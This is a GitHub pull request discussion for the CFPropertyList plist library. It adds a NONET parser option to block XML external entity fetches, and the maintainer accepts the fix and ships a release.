Include NONET flag for security

ckruse / CFPropertyList

Read, write and manipulate both binary and XML property lists as defined by apple

MIT License

212 stars 47 forks source link

Include NONET flag for security #54

Closed tboyko closed 5 years ago

tboyko commented 5 years ago

Currently, CFPropertyList processes external URL entities in plists. This can lead to third party attacks: a PLIST is provided that references an external URL, causing CFPropertyList to contact the host of the URL to download its contents and include it in the XML.

This merge request extends the spirit of the NOENT parser option by adding NONET as well.

More information about this type of vulnerability is available at https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing

ckruse commented 5 years ago

Good catch. Thank you for your patch! :heart:

ckruse commented 5 years ago

I pushed a new release with your fix.